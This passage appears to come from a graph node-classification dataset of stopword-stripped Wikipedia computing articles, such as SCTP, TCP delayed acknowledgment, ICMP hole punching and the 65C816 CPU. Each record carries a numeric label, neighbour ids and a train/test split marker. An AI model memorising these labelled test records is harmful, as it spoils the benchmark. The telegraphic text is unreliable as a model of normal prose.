normalized let look book table previous examples see satisfies domain key normal form logically thickness determined number pages means depends pages key let set example convention saying book 350 pages considered slim book 350 pages considered thick convention technically constraint neither domain constraint key constraint therefore rely domain constraints key constraints keep data integrity words nothing prevents us putting example thick book 50 pages makes table violate dknf solve create table holding enumeration defines thickness remove column original table way domain integrity violation eliminated table dknf simple intuitive definition sixth normal form table 6nf row contains primary key one attribute means example publishers table designed creating 1nf needs decomposed two tables normalization 6nf mostly used data warehouses benefits outweigh drawbacks",
    "neighbors": [
      8201,
      10258,
      2068,
      1049,
      5658,
      5151,
      9248,
      8742,
      10793,
      10286,
      11324,
      11327,
      9286,
      72,
      2632,
      9290,
      8788,
      10326,
      4183,
      7767,
      11362,
      9828,
      10340,
      8808,
      2669,
      1142,
      2681,
      1146,
      3196,
      6782,
      2688,
      10389,
      4255,
      5792,
      5794,
      5795,
      4263,
      10413,
      5808,
      10418,
      9397,
      3768,
      4281,
      7868,
      11457,
      6850,
      2246,
      6860,
      9942,
      2780,
      734,
      10471,
      6383,
      244,
      7412,
      9467,
      9481,
      10505,
      1292,
      8979,
      7446,
      10518,
      4376,
      11030,
      5403,
      284,
      7968,
      290,
      1314,
      7461,
      2344,
      9527,
      1341,
      4416,
      2369,
      5441,
      5953,
      10048,
      8518,
      6983,
      853,
      2901,
      10069,
      347,
      860,
      9075,
      9079,
      10628,
      10632,
      9108,
      2456,
      9112,
      10137,
      9631,
      9634,
      1447,
      7080,
      5550,
      946,
      3001,
      3004,
      9661,
      9663,
      9177,
      10201,
      987,
      5595,
      9183,
      4065,
      2022,
      2024,
      2025,
      2026,
      6124,
      2544,
      10737
    ],
    "mask": "Test"
  },
  {
    "node_id": 3005,
    "label": 5,
    "text": "TCP_delayed_acknowledgment:tcp delayed acknowledgment tcp delayed acknowledgment technique used implementations transmission control protocol effort improve network performance essence several ack responses may combined together single response reducing protocol overhead however circumstances technique reduce application performance described rfc 1122 host may delay sending ack response 500 ms. additionally stream full-sized incoming segments ack responses must sent every second segment delayed acks give application opportunity update tcp receive window also possibly send immediate response along ack certain protocols telnet delayed acks reduce number responses sent server factor 3 combining ack window update response data one segment additional wait time introduced delayed ack cause delays interacting certain applications configurations nagle algorithm used sending party data queued sender ack received sender send enough data fill maximum segment size example performs two small writes followed blocking read transfer pause ack delay timeout linux 2.4.4+ supports codice_1 socket option disables delayed ack example consider situation bob sending data carol bob socket layer less complete packet worth data remaining send per nagle algorithm sent receives ack data already sent time carol application layer send response gets data carol using delayed acks socket layer send ack timeout reached application transmitting data smaller chunks expecting periodic acknowledgment replies negative interaction occur prevent delay application layer needs continuously send data without waiting acknowledgment replies alternatively nagle algorithm may disabled application sending side",
    "neighbors": [
      11112,
      5906,
      10924
    ],
    "mask": "Train"
  },
  {
    "node_id": 3006,
    "label": 5,
    "text": "Stream_Control_Transmission_Protocol:stream control transmission protocol stream control transmission protocol sctp computer networking communications protocol operates transport layer serves role similar popular protocols tcp udp standardized ietf rfc 4960 sctp provides features udp tcp message-oriented like udp ensures reliable in-sequence transport messages congestion control like tcp differs protocols providing multi-homing redundant paths increase resilience reliability absence native sctp support operating systems possible tunnel sctp udp well map tcp api calls sctp calls existing applications use sctp without modification reference implementation released part freebsd version 7 since widely ported ietf signaling transport sigtran working group defined protocol number 132 year 2000 ietf transport area tsvwg working group maintains rfc 4960 defines protocol rfc 3286 provides introduction sctp applications submit data transmitted messages groups bytes sctp transport layer sctp places messages control information separate chunks data chunks control chunks identified chunk header protocol fragment message number data chunks data chunk contains data one user message sctp bundles chunks sctp packets sctp packet submitted internet protocol consists packet header sctp control chunks necessary followed sctp data chunks available one characterize sctp message-oriented meaning transports sequence messages group bytes rather transporting unbroken stream bytes tcp udp sctp sender sends message one operation exact message passed receiving application process one operation contrast tcp stream-oriented protocol transporting streams bytes reliably order however tcp allow receiver know many times sender application called tcp transport passing groups bytes sent sender tcp simply appends bytes queue bytes waiting go network rather keep queue individual separate outbound messages must preserved term multi-streaming refers capability sctp transmit several independent streams chunks parallel example transmitting web page images together web page text essence involves bundling several connections single sctp association operating messages chunks rather bytes tcp preserves byte order stream including byte sequence number segment sctp hand assigns sequence number message-id message sent stream allows independent ordering messages different streams however message ordering optional sctp receiving application may choose process messages order receipt instead order sending features sctp include designers sctp originally intended transport telephony signaling system 7 internet protocol goal duplicating reliability attributes ss7 signaling network ip ietf effort known sigtran meantime uses proposed example diameter protocol reliable server pooling rserpool tcp provided primary means transfer data reliably across internet however tcp imposed limitations several applications rfc 4960 adoption slowed lack awareness lack implementations particularly microsoft windows lack application support lack network support sctp provides redundant paths increase reliability sctp end point needs check reachability primary redundant addresses remote end point using heartbeat sctp end point needs acknowledge heartbeats receives remote end point sctp sends message remote address source interface decided routing table host sctp asymmetric multi homing one two end points support multi homing local multi homing remote single homing remote primary address reachable sctp association fails even alternate path possible sctp packet consists two basic sections chunk starts one byte type identifier 15 chunk types defined rfc 4960 least 5 defined additional rfcs eight flag bits two byte length field data compose remainder chunk chunk form multiple 4 bytes i.e. length multiple 4 padded zeros included chunk length two byte length field limits chunk 65,535 byte length including type flags length fields although encryption part original sctp design sctp designed features improved security 4-way handshake compared tcp 3-way handshake protect syn flooding attacks large cookies association verification authenticity reliability also key part security design sctp multihoming enables association stay open even routes interfaces particular importance sigtran carries ss7 ip network using sctp requires strong resilience link outages maintain telecommunication service even enduring network anomalies sctp sometimes good fingerprinting candidate operating systems ship sctp support enabled well known tcp udp sometimes overlooked firewall intrusion detection configurations thus often permitting probing traffic sctp reference implementation runs freebsd mac os x microsoft windows linux following operating systems implement sctp third-party drivers userspace library following applications implement sctp",
    "neighbors": [
      10242,
      1030,
      3592,
      8211,
      5652,
      6681,
      6682,
      4636,
      10271,
      6689,
      9251,
      2085,
      7208,
      7214,
      8238,
      562,
      1586,
      9269,
      5177,
      11321,
      3133,
      4158,
      5181,
      6723,
      11332,
      8265,
      8266,
      4687,
      7249,
      9306,
      10341,
      10344,
      3695,
      10864,
      4723,
      9844,
      2679,
      4729,
      5241,
      9343,
      5251,
      9860,
      649,
      9868,
      2701,
      6797,
      3218,
      9365,
      11413,
      152,
      10908,
      2206,
      3742,
      161,
      2212,
      9380,
      9381,
      3751,
      3752,
      172,
      10924,
      6318,
      6319,
      2739,
      9909,
      1718,
      4793,
      7865,
      5819,
      4797,
      702,
      706,
      11459,
      7364,
      8905,
      8395,
      1229,
      5843,
      10455,
      6361,
      10461,
      7391,
      3297,
      3813,
      2797,
      751,
      8432,
      8946,
      5875,
      1273,
      3322,
      2299,
      9987,
      3847,
      1297,
      274,
      5906,
      10005,
      1304,
      5402,
      5405,
      10016,
      9511,
      10535,
      11566,
      7983,
      7984,
      10035,
      11573,
      823,
      6456,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      10058,
      849,
      850,
      6993,
      1876,
      2904,
      6491,
      7003,
      5469,
      5470,
      5471,
      5472,
      2913,
      7521,
      1891,
      10589,
      1893,
      871,
      11112,
      361,
      7017,
      367,
      7027,
      2421,
      2424,
      891,
      6524,
      2431,
      11647,
      6531,
      10115,
      1927,
      6541,
      7570,
      9625,
      1946,
      5531,
      10653,
      10144,
      10659,
      933,
      2983,
      941,
      6577,
      11698,
      2996,
      5559,
      9146,
      10171,
      9665,
      9670,
      2509,
      8669,
      8670,
      10723,
      998,
      10727,
      4073,
      3564,
      4589,
      5102,
      9201,
      3058,
      6651,
      3580,
      5118,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 3007,
    "label": 2,
    "text": "Network_operating_system:network operating system network operating system specialized operating system network device router switch firewall historically operating systems networking capabilities described network operating system allowed personal computers pcs participate computer networks shared file printer access within local area network lan description operating systems largely historical common operating systems include network stack support client–server model early microcomputer operating systems cp/m dos classic mac os designed one user one computer packet switching networks developed share hardware resources mainframe computer printer large expensive hard disk local area network technology became available two general approaches handle sharing resources networks arose historically network operating system operating system computer implemented network capabilities operating systems network stack allowed personal computers participate client-server architecture server enables multiple clients share resources printers early examples client-server operating systems shipped fully integrated network capabilities novell netware using internetwork packet exchange ipx network protocol windows server 2003 banyan vines used variant xerox network systems xns protocols peer-to-peer network operating systems also developed used networking capabilities share resources files located personal computers system based file server centralized management source peer-to-peer network sets connected computers equal share abilities use resources available network examples early peer-to-peer operating systems networking capabilities include appleshare used networking connecting apple products lantastic supporting dos microsoft windows os/2 computers well windows workgroups used networking peer-to-peer windows computers today distributed computing groupware applications become norm computer operating systems include networking stack matter course 1980s need integrate dissimilar computers network capabilities grew number networked devices grew rapidly partly allowed multi-vendor interoperability tcp/ip protocol suite became almost universally adopted network architectures therefore computer operating systems firmware network devices needed reliably support tcp/ip protocols network operating systems embedded router hardware firewall operates functions network layer layer 3 notable network operating systems include",
    "neighbors": [
      6401,
      2179,
      2948,
      4611,
      10627,
      11011,
      2825,
      6797,
      3477,
      1814,
      25,
      412,
      8998,
      2087,
      2222,
      7983,
      178,
      6834,
      823,
      4409,
      1211,
      9279,
      576,
      8256,
      8640,
      10433,
      5959,
      5322,
      5452,
      11086,
      10451,
      9048,
      5472,
      4074,
      9194,
      5624,
      6523
    ],
    "mask": "None"
  },
  {
    "node_id": 3008,
    "label": 9,
    "text": "Bean_Validation:bean validation bean validation defines metadata model api javabean validation metadata source annotations ability override extend meta-data use xml validation descriptors originally defined part java ee version 2 aims work java se apps well java bean validation jsr 303 originated framework approved jcp 16 november 2009 accepted part java ee 6 specification hibernate team provides hibernate validator reference implementation bean validation also created bean validation tck implementation jsr 303 needs pass bean validation 2.0 defined jsr 380 approved 2017-07-31 major release leverages language features java 8 useful purposes bean validation java 8 required minimum java version changes include bean validation 1.1 jsr 349 improves upon initial version 1.0 jsr 303 significant changes include final release 1.1 specification occurred 2013-05-24",
    "neighbors": [
      9988,
      3341,
      10526,
      10020,
      6067,
      2106,
      3517,
      6334,
      3518,
      11582,
      1095,
      6860,
      3278,
      3920,
      4959,
      4960,
      479,
      3558,
      1128,
      3560,
      3562,
      9834,
      3954
    ],
    "mask": "Test"
  },
  {
    "node_id": 3009,
    "label": 4,
    "text": "Agbogbloshie:agbogbloshie agbogbloshie nickname commercial district korle lagoon odaw river near center accra ghana capital city near slum called old fadama agbogbloshie site became known destination locally generated automobile electronic scrap collected across city accra alleged center legal illegal exportation network environmental dumping electronic waste e-waste industrialized nations basel action network small ngo based seattle referred agbogbloshie digital dumping ground allege millions tons e-waste processed year however repeated international studies failed confirm allegations labelled e-waste hoax international reuse advocate wr3a exhaustive study trade used electronics nigeria funded unep basel convention revealed 540 000 tonnes informally processed waste electronics 52 material recovered according statistics world bank large cities like accra lagos majority households owned televisions computers decades un report weee africa 2012 disclosed majority used electronics found african dumps fact recently imported scrap originated african cities agbogbloshie situated banks korle lagoon northwest accra central business district roughly 40,000 ghanaians inhabit area migrants rural areas due harsh living conditions rampant crime area nicknamed sodom gomorrah basel convention prevents transfrontier shipment hazardous waste developed less developed countries however convention specifically allows export reuse repair annex ix b1110 numerous international press reports made reference allegations majority exports ghana dumped research us international trade commission found little evidence unprocessed e-waste shipped africa united states finding corroborated united nations environment programme mit memorial university arizona state university research 2013 original source allegation blaming foreign dumping material found agbogbloshie recanted rather stated never made claim 80 us e-waste exported whether domestically generated residents ghana imported concern remains methods waste processing especially burning emit toxic chemicals air land water exposure especially hazardous children toxins known inhibit development reproductive system nervous system especially brain concerns human health environment agbogbloshie continue raised area remains heavily polluted 2000s ghanaian government new funding loans implemented korle lagoon ecological restoration project klerp environmental remediation restoration project address pollution problem dredging lagoon odaw canal improve drainage flooding ocean 1960s slum area agbogbloshie wetland city accra urbanized ghetto grew referred old fadama ayaalolo 1980s ghetto place shelter refugees konkomba-nanumba war late 1990s newly available electricity akosombo dam led increased local demand electric electronic appliance consumption critics claim caused imbalanced shift electricity akosombo dam increased demand functional second-hand televisions computers imported west africa tech sector help ‘ bridge digital divide ’ ghanaians welcomed donations computers cost one-tenth price new one basel action network circulated claim 2008 much 75 percent second-hand electronics sent africa could reused ended landfills ban allegation slightly different 2002 claim 80 waste exporting harm 2002 became one cited references academic journals though documentation peer reviewed source documentation made available mapping e-waste controversy statements debates ii 2013 ban denied ever making claim ever stating statistic african imports local economy agbogbloshie based onion market serving immigrants accra greater tamale region dagbani north unemployed immigrants turned scrap metal collection including auto scrap supplement incomes electronic scrap processing fairly small activity market claim hundreds millions tons electronic waste imported area year reported several news sources considered experts utterly ridiculous preposterous united states definitely leading exporter e-waste ghana although imports arrive countries france germany korea switzerland netherlands multinational brands philips canon dell microsoft nokia siemens sony commonly found throughout waste according e-waste assessment studies refurbishing eee sales used eee important economic sector e.g alaba market lagos well-organized dynamic sector holds potential industrial development indirectly sector another important economic role supplies low middle income households affordable ict equipment eee view sector ’ positive socio-economic performance policy measures aiming improve e-waste management nigeria refrain undifferentiated banning second-hand imports refurbishing activities strive co-operative approach including market sector associations followers ban.org alleged non-governmental organizations ngos adding waste excess electronics donated intention helping scholarly institutions claim based 75 -80 orphaned waste statistic exporters must found numerous loopholes avoid legislation forbidding e-waste shipping labeling broken electronics ‘ end-of-life ’ ‘ second-hand-goods ’ falsely identifying working order true 50 75 electronics imported unable salvaged remain land import would illegal however un studies failed find evidence allegation source dumping statistic denied young men burning wires auto harnesses electronics subject several photojournal essays workers mostly young men disassemble cars appliances scrap electronics gathered wheeled push carts accra neighborhoods revenue recovery metals copper aluminum iron produce low wages several british news outlets made recycling workers cause celebre photographs workers burning old wire top tires plastic order melt plastic dismantling waste bare hands stones popularized press magnets electronics shown used gather smallest ferrous metal scraps remaining materials burned dumped nearby workers children adults alike sell metal scraps earn living half sack copper aluminium sell 700 ghana cedis amounting eight ten ghana cedis per day 4 6 usd population agbogbloshie consists economic migrants northern rural parts ghana living standards growing worse causing people move urban settings agbogbloshie conditions may significantly better making living easier inhabitants agbogbloshie live eat work relieve land amongst waste children able attend school often spend every evening weekend processing waste searching metals dwellings wooden shacks lack water sanitation area also home armed robbers prostitutes drug dealers others involved underground markets crime disease run rampant throughout agbogbloshie creating almost uninhabitable environment humans outsiders nicknamed area “ sodom gomorrah ” two condemned biblical cities due harsh living conditions agbogbloshie processing dumping electronic waste agbogbloshie polluting area creating serious environmental concern photographs agbogbloshie e-waste landfill show scrap workers burning wires auto harnesses plastic-encased electronics recover copper e-waste contains toxic chemicals emitted ground water atmosphere electronics broken burned processed poisons lead mercury arsenic dioxins furans brominated flame retardants seep surrounding soil water thereby seriously polluting landscape greenpeace lab tests shown water soil areas agbogbloshie revealed area contained concentrations chemicals levels hundred times allowable amount.several studies confirmed high levels lead soil particular risks workers children environmental lead contamination predominantly due burning plastic covering copper wires pvc insulation contains approximately 3000 mg/kg lead stiffener lead released burning guardian april 2019 reported study ipen basel action network found dangerous levels dioxins polychlorinated biphenyls pcbs chicken eggs agbogbloshie lead containing glass used computer monitors crt tubes also contributes elevated soil lead levels korle lagoon agbogbloshie situated extremely low levels dissolved oxygen result large uncontrolled quantities domestic industrial waste emitted water studies indicate entrance lagoon severely polluted suitable primary secondary contact due large amounts bacteria present processing electronic waste presents serious health threat workers agbogbloshie fumes released burning plastics metals used electronics composed highly toxic chemicals carcinogens workers often inhale lead cadmium dioxins furans phthalates brominated flame retardants.exposure fumes especially hazardous children toxins known inhibit development reproductive system nervous system brain particular similar e-waste processing areas conditions demographics like agbogbloshie 80 children dangerous levels lead blood inhabitants often suffer chronic nausea headaches chest respiratory problems high levels toxins also discovered soil food samples chemicals stay food chain e-waste presents potential security threat individuals exporting countries hard drives properly erased computer disposed reopened exposing sensitive information credit card numbers private financial data account information records online transactions accessed willing individuals organized criminals ghana commonly search drives information use local scams government contracts discovered hard drives found agbogbloshie multimillion-dollar agreements united states security institutions defense intelligence agency dia transportation security administration homeland security resurfaced agbogbloshie ghanaian government made effort restore area “ korle lagoon ecological restoration project ” klerp 2003 opec fund international development arab bank economic development africa kuwait fund arab economic development provided loan project expectation ghanaian government dredge lagoon restore surroundings goals project include reduction flooding increase marine life improvement water quality improvement general sanitary conditions due invasive nature project restoration efforts disputed inhabitants agbogbloshie klerp requires people leave area home majority squatters accra metropolitan assembly ama continually tried evict people met much resistance matter still dispute 2014 ngo pure earth formally blacksmith institute funded creation copper wire recycling center within agbogbloshie helped install several automated machines simplify removal plastic coating reduce burning efforts appear moderately successful however burning continues",
    "neighbors": [
      8836,
      11368,
      3279,
      7579,
      1400,
      9499
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3010,
    "label": 3,
    "text": "WDC_65C816:wdc 65c816 w65c816s also 65c816 65816 8/16-bit microprocessor mpu developed sold western design center wdc introduced 1983 w65c816s enhanced version wdc 65c02 8-bit mpu cmos enhancement venerable mos technology 6502 nmos mpu 65816 cpu apple iigs super nintendo entertainment system 65 part designation comes 65c02 compatibility mode 816 signifies mpu selectable 8– 16–bit register sizes addition availability 16 bit registers w65c816s features extended memory addressing 24-bits supporting 16 megabytes random-access memory enhanced instruction set 16 bit stack pointer well several new electrical signals improved system hardware management reset w65c816s starts emulation mode meaning substantially behaves 65c02 thereafter w65c816s may switched native mode two instruction sequence causing enable enhanced features yet still maintain substantial degree backward compatibility 65c02 software however unlike pdip40 version 65c02 pin-compatible replacement nmos ancestor pdip40 w65c816s pin-compatible 6502 family mpu related w65c816s w65c802 internal structure 16-bit support used 40-pin layout compatible original 6502 allowed used drop-in replacement certain roles lack new address pins limited 64 kb memory see extensive use longer produced 1981 bill mensch founder ceo wdc began development 65c02 production partners primarily rockwell semiconductor synertek primary goal 65c02 effort move original 6502 nmos process 65c02 cmos would allow run much lower power levels somewhere running clock speeds number new opcodes bug fixes also worked design development w65c816s commenced 1982 mensch consulted apple computer new version apple ii series personal computers would among things improved graphics sound apple wanted mpu would software compatible 6502 use apple ii ability address memory load store 16 bit words result 65c816 finished march 1984 samples provided apple atari second half year full release 1985 mensch aided design process sister kathryn responsible part device layout process also led 65c802 identical inside 65c816 produced fabrication lines diverged last metalization stages chip connected external pins 65c802 pins layout original 6502 allowed used drop-in replacement still allowing 16-bit processing cpu used however used original pinout 16 addressing pins could therefore access 64 kb external memory typically hardware manufacturers designed project ground used 65c816 rather 65c802 resulting latter withdrawn production apple subsequently integrated 65c816 apple iigs computer basic 65c816 design second-sourced gte sanyo others mid-to-late 1980s early 1990s 1990s 65c816 65c02 converted fully static core made possible completely stop processor clock without losing data registers feature along use asynchronous static ram made possible produce designs used minimal power standby state w65c816s available wdc 40 pin pdip plcc44 package well core asic integration example winbond w55v9x series tv edutainment ics wdc fabless semiconductor company works various foundries produce w65c816s well compatible products discrete processors available number electronics distributors designers wish include w65c816s functionality custom asic wdc offers rtl register-transfer level code verilog wdc 65816 features 65c816 two modes emulation mode 16-bit operations registers invisible chip appeared original 6502 cycle timings opcodes native mode made additional features visible cpu automatically returned emulation mode powered reset allowed drop-in replace 6502 obvious change 65c816 running 16-bit mode expansion various registers 8-bit 16-bit values affects accumulator x index registers stack pointer sp affect program counter p always 16-bit running native mode two bits status register change meaning original 6502 bits 4 5 used although bit 4 sometimes referred b reak flag native mode bit 4 becomes x flag bit 5 becomes flag bits control whether index registers x and/or accumulator/memory 8-bit 16-bit values zeros bits indicate 16-bit values ones indicate 8-bit values bits normally zero chip started remain switched native mode might immediately obvious one would want use 16-bit registers 8-bit mode switching 8-bit mode using new codice_1 set bit processor status codice_2 reset instructions means subsequent instructions accessing registers read single byte instead two instance bit set 1 codice_3 instruction issued single byte address 1234 read thereby reducing number cycles needed execute instruction particularly useful dealing 8-bit character data instance running 16-bit mode operations registers effect 16-bits instance left shift codice_4 shift 16 bits major change system running native mode memory model expanded 24-bit format original 16-bit format 6502 handled using 8-bit offset registers data bank register dbr program bank register pbr addresses code remain original 16-bit format values dbr pbr prepended form 24-bit address main memory means instructions access data within 64 kb page bank referred data outside page needs accessed dbr change likewise instructions lie anywhere memory using pbr branch jump instructions within bank addition register set direct page register set base address formerly called zero page referred direct page direct page offers special addressing mode requires one byte offer significantly improved performance used wisely 6502 direct page always first 256 bytes memory thus zero page whereas 16-bit register offset location 24-bit memory current mode operation stored emulation bit enough bits left status register hold new mode bit unique solution used mode bit left invisible unable directly accessed new codice_5 exchange carry emulation exchanges value emulation bit c arry bit bit 0 status register instance one wants enter native mode processor started one would use codice_6 clear carry bit codice_5 write emulation bit returning 6502 mode uses codice_8 cpu switches native mode upper 8-bits registers initially set zero read written complete 16-bit values point assuming x 16-bit mode system switches back 8-bit mode value upper 8-bits maintained return system switches back native systems based 65816 variants also used c-one supercpu enhancements commodore 64",
    "neighbors": [
      1922,
      11395,
      1029,
      9739,
      6415,
      10767,
      664,
      5529,
      3615,
      8352,
      4385,
      10784,
      6821,
      7589,
      11054,
      1461,
      9911,
      2874,
      4424,
      5065,
      2383,
      3157,
      6485,
      10969,
      1501,
      5862,
      10734,
      10351,
      1776,
      4465,
      5617,
      7281,
      372,
      7282,
      7284,
      11125,
      9338
    ],
    "mask": "None"
  },
  {
    "node_id": 3011,
    "label": 4,
    "text": "ICMP_hole_punching:icmp hole punching icmp hole punching technique employed network address translator nat applications maintaining internet control message protocol icmp packet streams traverse nat nat traversal techniques typically required client-to-client networking applications internet involving hosts connected private networks especially peer-to-peer voice internet protocol voip deployments icmp hole punching establishes connectivity two hosts communicating across one network address translators either peer-to-peer client-server model typically third party hosts public transit network used establish udp tcp port states may used direct communications communicating hosts however icmp hole punching requires third party involvement pass information one nats exploiting nat loose acceptance inbound icmp time exceeded packets icmp time exceeded packet reaches destination nat arbitrary data packet expected nat allows packet reach destination server allowing destination server obtain client public ip address data stored packet client currently method icmp hole punching hole punching without third party involvement autonomous nat traversal developed samy kamkar january 22 2010 released open source software pwnat method later published ieee according paper proposed technique assumes client somehow learned current external globally routable ip address server nat key idea enabling server learn client's ip address server periodically send message fixed known ip address simplest approach uses icmp echo request messages unallocated ip address 1.2.3.4 since 1.2.3.4 allocated icmp request routed routers without default route icmp destination unreachable messages may created routers ignored server result messages sent 1.2.3.4 nat enable routing replies response request connecting client fake reply specifically client transmit icmp message indicating ttl_expired message could legitimately transmitted internet router sender address would expected match server target ip server listens fake icmp replies upon receipt initiates connection sender ip specified icmp reply",
    "neighbors": [
      8640,
      1381,
      5402,
      6541,
      14,
      3792,
      4435,
      6964,
      8308,
      3770
    ],
    "mask": "Test"
  },
  {
    "node_id": 3012,
    "label": 9,
    "text": "PHP_License:php license php license software license php scripting language released php license designed encourage widespread adoption source code redistribution permitted source binary form without modifications caveats version 3 php used dual license—php 3 source available either php license gnu general public license gpl practice discontinued php 4 php developers citing restrictions reuse associated gpl copyleft enforcement reason dropping zend engine core php interpreter separately licensed similar zend engine license contains similar naming restrictions php license applying names zend zend engine clause requiring advertising materials mention use php license open source license according open source initiative non-copyleft free software license according free software foundation license gpl-incompatible due restrictions usage term php debian maintainers long-standing discussion since least 2005 validity php license expressed concerns include license contains statements software covers specific distributing php software php therefore would false statements",
    "neighbors": [
      3553,
      8644
    ],
    "mask": "None"
  },
  {
    "node_id": 3013,
    "label": 2,
    "text": "USENIX_Annual_Technical_Conference:usenix annual technical conference usenix annual technical conference usenix atc canonically usenix conference computing professions sponsored usenix association conference includes computing tutorials single track technical session presenting refereed research papers sig meetings bofs several notable announcements talks usenix 1995 james gosling announced oak become java programming language john ousterhout first presented tcl usenet announced considered one prestigious operating systems venues rating australian ranking ict conferences era prior 1995 two usenix technical conferences held year one held summer winter",
    "neighbors": [
      1891,
      3267,
      394,
      5677,
      274,
      692,
      3350,
      8671
    ],
    "mask": "Test"
  },
  {
    "node_id": 3014,
    "label": 3,
    "text": "Clipper_architecture:clipper architecture clipper architecture 32-bit risc-like instruction set architecture designed fairchild semiconductor architecture never enjoyed much market success computer manufacturers create major product lines using clipper processors intergraph high level hardware first processors using clipper architecture designed sold fairchild division responsible subsequently sold intergraph 1987 intergraph continued work clipper processors use systems clipper architecture used simplified instruction set compared earlier cisc architectures incorporate complicated instructions present contemporary risc processors instructions implemented so-called macro instruction rom within clipper cpu scheme allowed clipper somewhat higher code density risc cpus initial clipper microprocessor produced fairchild c100 became available 1986 followed faster c300 intergraph 1988 final model clipper c400 released 1990 extensively redesigned faster added floating-point registers c400 processor combined two key architectural techniques achieve new level performance — superscalar instruction dispatch superpipelined operation many processors time used either superscalar instruction dispatch superpipelined operation clipper c400 first processor use intergraph started work subsequent clipper processor design known c5 never completed released nonetheless advanced processor design techniques devised c5 intergraph granted patents patents along original clipper patents basis patent-infringement lawsuits intergraph intel companies unlike many microprocessors clipper processors actually sets several distinct chips c100 c300 consist three chips one central processing unit containing integer unit floating point unit two cache memory management units cammus one responsible data one instructions cammus contained caches translation lookaside buffers support memory protection virtual memory c400 consists four basic units integer cpu fpu mmu cache unit initial version used one chip cpu fpu discrete elements mmu cache unit later versions mmu cache unit combined one cammu chip clipper 16 integer registers r15 used stack pointer 16 floating-point registers limited 8 early implementations plus program counter pc processor status word psw containing alu fpu status flags trap enables system status word ssw containing external interrupt enable user/supervisor mode address translation control bits user supervisor mode separate banks integer registers interrupt handling consisted saving pc psw ssw stack clearing psw loading pc ssw memory trap vector clipper load/store architecture arithmetic operations could specify register immediate operands basic instruction parcel 16 bits 8 bits opcode 4 bits source register 4 bits destination register immediate-operand forms allowed 1 2 following instruction parcels specify 16-bit sign-extended 32-bit immediate operand processor uniformly little-endian including immediate operands special quick encoding 4-bit unsigned operand provided add subtract load move quick register move complement quick register addressing modes load/store branch instructions follows displacements sign-extended addition usual logical arithmetic operations processor supported complex macro instructions allowed instructions allowed arbitrary stack pointer register specified except user register save/restore multiple-register operations could use r15 intergraph sold several generations clipper systems including servers workstations systems included interact interserve interpro product lines targeted largely cad market fairchild promoted clix operating system version unix system v use clipper intergraph adopted clix clipper-based systems continued develop operating system available systems intergraph work version microsoft windows nt clipper systems publicly demonstrated effort canceled release intergraph decided discontinue clipper line began selling x86 systems windows nt instead",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      4144,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      3175,
      8815,
      6268,
      3197,
      639,
      7313,
      9371,
      8861,
      6815,
      5793,
      6818,
      6821,
      6311,
      682,
      7852,
      4269,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      249,
      8700,
      8450,
      1798,
      1801,
      6926,
      6415,
      8976,
      1298,
      11539,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      8514,
      4423,
      7505,
      9044,
      344,
      1376,
      8551,
      10603,
      8048,
      4465,
      10612,
      1399,
      7033,
      1402,
      3451,
      3457,
      3470,
      5518,
      407,
      409,
      10658,
      3493,
      9126,
      426,
      10669,
      1967,
      2480,
      2995,
      10675,
      1461,
      1462,
      1463,
      4030,
      6084,
      453,
      6607,
      466,
      2517,
      1499,
      7134,
      5090,
      995,
      7653,
      10734,
      6639,
      499,
      4596,
      2039,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 3015,
    "label": 5,
    "text": "Geary_(e-mail_client):geary e-mail client geary free open-source email client written vala based webkitgtk although since adopted gnome project originally developed yorba foundation purpose e-mail client according adam dingle yorba founder bring back users online webmails faster easier use desktop application pantheon mail fork initiated elementary os community demise yorba though point decided rewrite scratch remaining references geary pantheon code base translations implementation support gpg started still incomplete 2019 geary internally uses sqlite database store local copy emails indexing uses fully asynchronous gobject-based imap client library one feature distinguishes geary open source email clients focus conversation view geary pantheon mail using gettext translations pantheon mail migrated webkitgtk+2 yet developers decided first migrate code managing conversation view use native gtk widgets gtk.css granite gtk+ library used part elementary os offered several advantages including minimizing use webviews reducing code supporting hardware accelerated animations supporting rtl languages also removed use custom gtk bars like codice_5 making code complicated difficult read geary uses webkit2 since least version 3.32.0 historically elementary os directly supported project geary became default application gnu/linux distribution march 25 2013 jim nelson executive director yorba launched crowdfunding campaign indiegogo gather us 100,000 would used pay 3 full-time yorba engineers working time geary unfortunately april 23 2013 us 50,860 gathered 1,192 backers amount met campaign failed according rules set indiegogo yorba receive money pledged failure jim nelson declared blog post crowdfunding campaign kind experiment see route enough sustain open-source development reaffirmed geary created improve linux experience therefore chance ported os x windows platforms yorba foundation stopped activities gnome announced plans project time future geary unclear result uncertainties due previous design disagreements old geary team elementary os actually using geary default mail client though heavily patched version daniel foré leader elementary os decided fork project continue development fork project renamed pantheon mail process pantheon mail replaced geary elementary os 0.4 codenamed loki march 2016 michael gratton applied become new maintainer geary main goal try fixing pressing issues like dependency old webkit1gtk collaboration pantheon mail better support non-gmail servers mailbox management account ui extending search etc contributing geary gnome project requires maintainer become gnome member discussion adam dingle yorba founder agreed wait gratton fulfill gnome membership application requirements meantime gratton post patches gnome bugzilla instance adam commit version 0.11 released version 0.13 released february 18 2019 shortly afterwards version scheme changed match gnome release schedule current geary version 3.32 initial name geary coincides name geary street yorba products named streets san francisco however according former yorba employee application named address yorba foundation located actually coincidence first beta geary released may 2012 yorba still located capp street time",
    "neighbors": [
      1664,
      2050,
      9986,
      11394,
      3465,
      2955,
      6413,
      10255,
      8848,
      9872,
      3859,
      9747,
      5397,
      7450,
      11418,
      1822,
      6691,
      6694,
      5546,
      9642,
      8621,
      7983,
      1075,
      9908,
      2101,
      9909,
      823,
      3649,
      708,
      10956,
      4177,
      6231,
      7255,
      487,
      5095,
      4459,
      9451,
      10861,
      9459,
      3189,
      3578,
      8443,
      7036
    ],
    "mask": "Test"
  },
  {
    "node_id": 3016,
    "label": 7,
